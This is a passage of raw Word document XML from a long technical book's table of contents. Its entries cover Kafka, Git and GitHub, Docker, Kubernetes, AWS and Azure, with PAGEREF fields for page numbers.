            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1215</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ED667DD" w14:textId="2038A7F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09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I have a different group id then can I consume the same message from 5 different microservice?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1216</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="525B4B4C" w14:textId="13319E2A"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00" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GitHub</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868100 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1218</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13647D6D" w14:textId="5BCB0A8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7868101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1218</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="112C77C5" w14:textId="498580F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7868102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1218</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71FB8ABE" w14:textId="4C264DB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7868103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1219</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A06947B" w14:textId="7CB2BD4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 Git commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1221</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="497B1D75" w14:textId="55002E3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7868105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1223</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1325E520" w14:textId="40886EEF"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06" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Docker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1224</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FD3CB60" w14:textId="2895E2C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Docker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1224</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B2DF80A" w14:textId="5F21D8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7868108 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1225</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D91937D" w14:textId="7C027A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0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7868109 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1226</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34D405FE" w14:textId="65C9622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7868110 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1227</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44F6A41C" w14:textId="60B2708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7868111 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1228</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4502A0E9" w14:textId="33046C1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7868112 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1229</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10E3E337" w14:textId="4D91ACA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7868113 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1229</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11905CEC" w14:textId="090D0EC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7868114 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1229</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A497617" w14:textId="5C62FA9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7868115 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1230</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F443E94" w14:textId="0F9498C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7868116 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1231</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18216EA9" w14:textId="1722F4A2"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17" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kubernetes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868117 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1233</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="559F1A64" w14:textId="7D10E1F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Kubernetes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868118 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1233</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53C455BA" w14:textId="605C18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1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ubernetes Architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868119 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1233</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E19B3E3" w14:textId="331304A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Kubernetes Services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868120 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1235</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B16D3D9" w14:textId="47A5F15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Kubernetes Secret?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868121 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1238</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25C9F125" w14:textId="06174E50"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22" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AWS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868122 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1241</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F34CC97" w14:textId="49A909F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7868123 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1241</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3799A6E1" w14:textId="6BBEE01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7868124 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1242</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CA3E067" w14:textId="034020F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7868125 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1243</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55E4A104" w14:textId="366F15C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7868126 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1244</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F01E8E0" w14:textId="49B92BE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7868127 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1245</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="474FABB9" w14:textId="2CC1EC6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7868128 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1246</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="567BA395" w14:textId="6BED690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2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7868129 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1247</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="603F80FD" w14:textId="33D77A63"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30" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Azure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868130 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1249</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
